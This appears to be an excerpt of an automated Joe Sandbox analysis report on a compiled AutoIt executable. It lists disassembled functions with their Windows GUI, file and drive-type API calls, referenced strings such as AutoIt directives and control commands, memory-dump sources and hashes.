GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DF8
GlobalFree.KERNEL32(00000000), ref: 007B7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007D2CAC,00000000), ref: 007B7E2B
GlobalFree.KERNEL32(00000000), ref: 007B7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007B7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007B7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B808F

Strings

, xrefs: 007B8015
AutoIt v3, xrefs: 007B7D42
DISPLAY, xrefs: 007B7EF2
static, xrefs: 007B7D8A, 007B7EE1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a8c036d92e496f8ae08aaa30baf464e7fdb716ec401d345ceaffe0fca23faa44
Instruction ID: 48a40eb7d8ec8c51be7820e196f0ffdf710f4a3478a0510e123c3b312b0c49db
Opcode Fuzzy Hash: a8c036d92e496f8ae08aaa30baf464e7fdb716ec401d345ceaffe0fca23faa44
Instruction Fuzzy Hash: C1026B71900119EFDB14DFA4CC89EAE7BB9FB89310F14815DF905AB2A1DB78AD01CB64

Function 007C37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,007CF910), ref: 007C38AF
IsWindowVisible.USER32(?), ref: 007C38D3

Strings

SENDCOMMANDID, xrefs: 007C3C62
UNCHECK, xrefs: 007C3B0B
SETCURRENTSELECTION, xrefs: 007C3A3E
ISVISIBLE, xrefs: 007C38BF
ISENABLED, xrefs: 007C38F3
GETCURRENTLINE, xrefs: 007C3B75
FINDSTRING, xrefs: 007C39FE
ADDSTRING, xrefs: 007C399E
GETLINE, xrefs: 007C3C23
EDITPASTE, xrefs: 007C3BE7
GETCURRENTCOL, xrefs: 007C3BB0
TABLEFT, xrefs: 007C390F
GETCURRENTSELECTION, xrefs: 007C3A6B
DELSTRING, xrefs: 007C39D1
ISCHECKED, xrefs: 007C3AC1
TABRIGHT, xrefs: 007C3925
GETLINECOUNT, xrefs: 007C3B4E
CURRENTTAB, xrefs: 007C3945
HIDEDROPDOWN, xrefs: 007C3988
SHOWDROPDOWN, xrefs: 007C3968
CHECK, xrefs: 007C3AF5
GETSELECTED, xrefs: 007C3B2B
SELECTSTRING, xrefs: 007C3A8E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9b7ba9dd61c1c81088711cc63ed30c2775f87ad098cdecf9ab76bfdabf3f516d
Instruction ID: e9a7300bc3e645b88299c8c130ac06e5ff38532234f7cbb9e2c95c7d0dd815fb
Opcode Fuzzy Hash: 9b7ba9dd61c1c81088711cc63ed30c2775f87ad098cdecf9ab76bfdabf3f516d
Instruction Fuzzy Hash: E6D14C70204305DBCB14EF24C459F6E77A5AF94344F10856CB9866B3A2DB3DEE0ACB92

Function 007CA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007CA89F
GetSysColorBrush.USER32(0000000F), ref: 007CA8D0
GetSysColor.USER32(0000000F), ref: 007CA8DC
SetBkColor.GDI32(?,000000FF), ref: 007CA8F6
SelectObject.GDI32(?,?), ref: 007CA905
InflateRect.USER32(?,000000FF,000000FF), ref: 007CA930
GetSysColor.USER32(00000010), ref: 007CA938
CreateSolidBrush.GDI32(00000000), ref: 007CA93F
FrameRect.USER32(?,?,00000000), ref: 007CA94E
DeleteObject.GDI32(00000000), ref: 007CA955
InflateRect.USER32(?,000000FE,000000FE), ref: 007CA9A0
FillRect.USER32(?,?,?), ref: 007CA9D2
GetWindowLongW.USER32(?,000000F0), ref: 007CA9FD

Part of subcall function 007CAB60: GetSysColor.USER32(00000012), ref: 007CAB99
Part of subcall function 007CAB60: SetTextColor.GDI32(?,?), ref: 007CAB9D
Part of subcall function 007CAB60: GetSysColorBrush.USER32(0000000F), ref: 007CABB3
Part of subcall function 007CAB60: GetSysColor.USER32(0000000F), ref: 007CABBE
Part of subcall function 007CAB60: GetSysColor.USER32(00000011), ref: 007CABDB
Part of subcall function 007CAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CABE9
Part of subcall function 007CAB60: SelectObject.GDI32(?,00000000), ref: 007CABFA
Part of subcall function 007CAB60: SetBkColor.GDI32(?,00000000), ref: 007CAC03
Part of subcall function 007CAB60: SelectObject.GDI32(?,?), ref: 007CAC10
Part of subcall function 007CAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 007CAC2F
Part of subcall function 007CAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CAC46
Part of subcall function 007CAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 007CAC5B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 6dc32ebeac228f983e6687d1bc541dc93c33e29c19353821bedcc4a78e4a6514
Instruction ID: 487becc615bbb2adcbc5dd4a522536d65745c28274cadc5cc6230f48d223bdba
Opcode Fuzzy Hash: 6dc32ebeac228f983e6687d1bc541dc93c33e29c19353821bedcc4a78e4a6514
Instruction Fuzzy Hash: 32A17C72008305FFD7119F64DC08E6B7BAAFB88325F148A2DFA62D61A0D739D944CB56

Function 00742C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00742CA2
DeleteObject.GDI32(00000000), ref: 00742CE8
DeleteObject.GDI32(00000000), ref: 00742CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00742CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00742D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0077C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0077C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0077CAED

Part of subcall function 00741B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00742036,?,00000000,?,?,?,?,007416CB,00000000,?), ref: 00741B9A

SendMessageW.USER32(?,00001053), ref: 0077CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0077CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0077CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0077CB62

Strings

0, xrefs: 0077C981

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: cc4b8b05e5cf9b86d3778d2e64d2e524d699974e976eb9e8ba279b4e96c71609
Instruction ID: 28b3f3d729c9a81ab275638ec5bfa70ce75e91c71475ff80dcd33e544f0d8cde
Opcode Fuzzy Hash: cc4b8b05e5cf9b86d3778d2e64d2e524d699974e976eb9e8ba279b4e96c71609
Instruction Fuzzy Hash: 98128E30604201EFDB16CF24C888BA9B7E5BF48350F54856DF559DB262CB39E852CFA1

Function 007B77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007B77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007B78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007B78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007B7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007B7946
GetClientRect.USER32(00000000,?), ref: 007B7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007B7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007B79A5
GetStockObject.GDI32(00000011), ref: 007B79B5
SelectObject.GDI32(00000000,00000000), ref: 007B79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007B79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B79D2
DeleteDC.GDI32(00000000), ref: 007B79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007B7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 007B7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007B7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007B7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 007B7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007B7AAE
GetStockObject.GDI32(00000011), ref: 007B7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007B7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007B7ACE

Strings

msctls_progress32, xrefs: 007B7A4F
AutoIt v3, xrefs: 007B793E
DISPLAY, xrefs: 007B799B
static, xrefs: 007B7990, 007B7AA8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 619147896f449240cd799d2b0a07025d1684e953904abd38309a4a6ed42bd7ac
Instruction ID: 3c7e82e053e2f1ab01454fc6d447820f597e44ac2dd7dbef72464af6601ad273
Opcode Fuzzy Hash: 619147896f449240cd799d2b0a07025d1684e953904abd38309a4a6ed42bd7ac
Instruction Fuzzy Hash: F2A152B1A40219BFEB14DB64DC4AFAF7BB9EB45710F108118FA15A72E0D778AD10CB64

Function 007AAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AAF89
GetDriveTypeW.KERNEL32(?,007CFAC0,?,\\.\,007CF910), ref: 007AB066
SetErrorMode.KERNEL32(00000000,007CFAC0,?,\\.\,007CF910), ref: 007AB1C4

Strings

Fixed, xrefs: 007AB0AE
Virtual, xrefs: 007AB18C
ATA, xrefs: 007AB13F
Network, xrefs: 007AB0A4
ATAPI, xrefs: 007AB138
SSD, xrefs: 007AB0F1
iSCSI, xrefs: 007AB169
PhysicalDrive, xrefs: 007AB012
SSA, xrefs: 007AB14D
USB, xrefs: 007AB15B
Removable, xrefs: 007AB0B8
1394, xrefs: 007AB146
RAMDisk, xrefs: 007AB090
SCSI, xrefs: 007AB131
\\.\, xrefs: 007AAFDB
SAS, xrefs: 007AB170
CDROM, xrefs: 007AB09A
FileBackedVirtual, xrefs: 007AB193
RAID, xrefs: 007AB162
MMC, xrefs: 007AB185
Fibre, xrefs: 007AB154
Unknown, xrefs: 007AB086, 007AB12A
SATA, xrefs: 007AB177

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 1f9c375eeb437d7b21bc2120a4e8eb564869be6b1496b3d2fa264f8378cbac9a
Instruction ID: 788b5c029b8a72ca03584d728779b1b6131ee5d40c1be3863f1d3cc6e31166d2
Opcode Fuzzy Hash: 1f9c375eeb437d7b21bc2120a4e8eb564869be6b1496b3d2fa264f8378cbac9a
Instruction Fuzzy Hash: D55193B068430DFB8B04EB20C996D7E77B2EBD63417208215F50AA7392D77DAD41DB62

Function 00746A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00746A91
__wcsnicmp.LIBCMT ref: 00746AA9
__wcsnicmp.LIBCMT ref: 00746AC1
__wcsnicmp.LIBCMT ref: 00746AD9
__wcsnicmp.LIBCMT ref: 00746AF1
__wcsnicmp.LIBCMT ref: 00746B09
__wcsnicmp.LIBCMT ref: 00746B21
__wcsnicmp.LIBCMT ref: 00746B35
__wcsnicmp.LIBCMT ref: 00746B76
__wcsnicmp.LIBCMT ref: 00746B8A
__wcsnicmp.LIBCMT ref: 00746B9E
__wcsnicmp.LIBCMT ref: 00746BB2

Strings

Unterminated group of comments, xrefs: 0077E82C
#include-once, xrefs: 00746AEB
Cannot parse #include, xrefs: 0077E819
#include, xrefs: 00746B03
#ce, xrefs: 00746BAC
#comments-end, xrefs: 00746B98
#OnAutoItStartRegister, xrefs: 00746AD3
Bad directive syntax error, xrefs: 0077E743
#notrayicon, xrefs: 00746AA3
#cs, xrefs: 00746B2F, 00746B84
#comments-start, xrefs: 00746B1B, 00746B70
#requireadmin, xrefs: 00746ABB
#pragma compile, xrefs: 00746A8B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: bcad5ac9762413adc9c4dde7aeb7df1db51bab546a7b8fc215a86702fe7b05d1
Instruction ID: a6d3720d941d6454b910e63e1563ccc5b90b5e3bd3985188f295e5ffd69f8109
Opcode Fuzzy Hash: bcad5ac9762413adc9c4dde7aeb7df1db51bab546a7b8fc215a86702fe7b05d1
Instruction Fuzzy Hash: E681FAB0740245FACF24AF70CC86FAE7768EF16740F14C165FD46AA182EB6CDA45D292

Function 007CAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007CAB99
SetTextColor.GDI32(?,?), ref: 007CAB9D
GetSysColorBrush.USER32(0000000F), ref: 007CABB3
GetSysColor.USER32(0000000F), ref: 007CABBE
CreateSolidBrush.GDI32(?), ref: 007CABC3
GetSysColor.USER32(00000011), ref: 007CABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CABE9
SelectObject.GDI32(?,00000000), ref: 007CABFA
SetBkColor.GDI32(?,00000000), ref: 007CAC03
SelectObject.GDI32(?,?), ref: 007CAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 007CAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 007CAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007CACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 007CACEC
DrawFocusRect.USER32(?,?), ref: 007CACF7
GetSysColor.USER32(00000011), ref: 007CAD05
SetTextColor.GDI32(?,00000000), ref: 007CAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007CAD21
SelectObject.GDI32(?,007CA869), ref: 007CAD38
DeleteObject.GDI32(?), ref: 007CAD43
SelectObject.GDI32(?,?), ref: 007CAD49
DeleteObject.GDI32(?), ref: 007CAD4E
SetTextColor.GDI32(?,?), ref: 007CAD54
SetBkColor.GDI32(?,?), ref: 007CAD5E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d9d41ff7c66c982270e53f55dc40c8e22c9f9a55e1698b43f17a5d7986be92cc
Instruction ID: 91689055e9667e86bc12c19cfe4fd5247d7bc6201ba908cf6cec8f090c718a26
Opcode Fuzzy Hash: d9d41ff7c66c982270e53f55dc40c8e22c9f9a55e1698b43f17a5d7986be92cc
Instruction Fuzzy Hash: F1614C71900218FFDF119FA8DC48EAE7B7AFB08325F148129F915AB2A1D7799D40DB90

Function 007C8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007C8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C8D45
CharNextW.USER32(0000014E), ref: 007C8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007C8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007C8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007C8DF9
SetWindowTextW.USER32(?,0000014E), ref: 007C8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007C8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 007C8E8C
_memset.LIBCMT ref: 007C8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007C8EFA
_memset.LIBCMT ref: 007C8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 007C8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 007C8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 007C9088
InvalidateRect.USER32(?,00000000,00000001), ref: 007C90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007C90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007C9121
DrawMenuBar.USER32(?), ref: 007C9130
SetWindowTextW.USER32(?,0000014E), ref: 007C9158

Strings

0, xrefs: 007C90C2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 1d7b6136182a4aaebdf43e03b10cde5fdf3988c1748a6d4b344fb7253e5d246f
Instruction ID: e9993ad1e5dae3a8d3fb2ab7da0dbb014ddbfc2cb2a05c27a59d3a93c4e08ff7
Opcode Fuzzy Hash: 1d7b6136182a4aaebdf43e03b10cde5fdf3988c1748a6d4b344fb7253e5d246f
Instruction Fuzzy Hash: 15E17170900219EBDF609F54CC89FEE7BB9EF05710F14815DFA16AA290DB788A81DF61

Function 007C4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007C4C51
GetDesktopWindow.USER32 ref: 007C4C66
GetWindowRect.USER32(00000000), ref: 007C4C6D
GetWindowLongW.USER32(?,000000F0), ref: 007C4CCF
DestroyWindow.USER32(?), ref: 007C4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007C4D68
SendMessageW.USER32(?,00000421,?,?), ref: 007C4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007C4D90
IsWindowVisible.USER32(?), ref: 007C4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007C4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007C4DDF
GetWindowRect.USER32(?,?), ref: 007C4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 007C4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 007C4E37
CopyRect.USER32(?,?), ref: 007C4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 007C4EB9

Strings

tooltips_class32, xrefs: 007C4D1D
(, xrefs: 007C4E2A
0, xrefs: 007C4BFC

Memory Dump Source

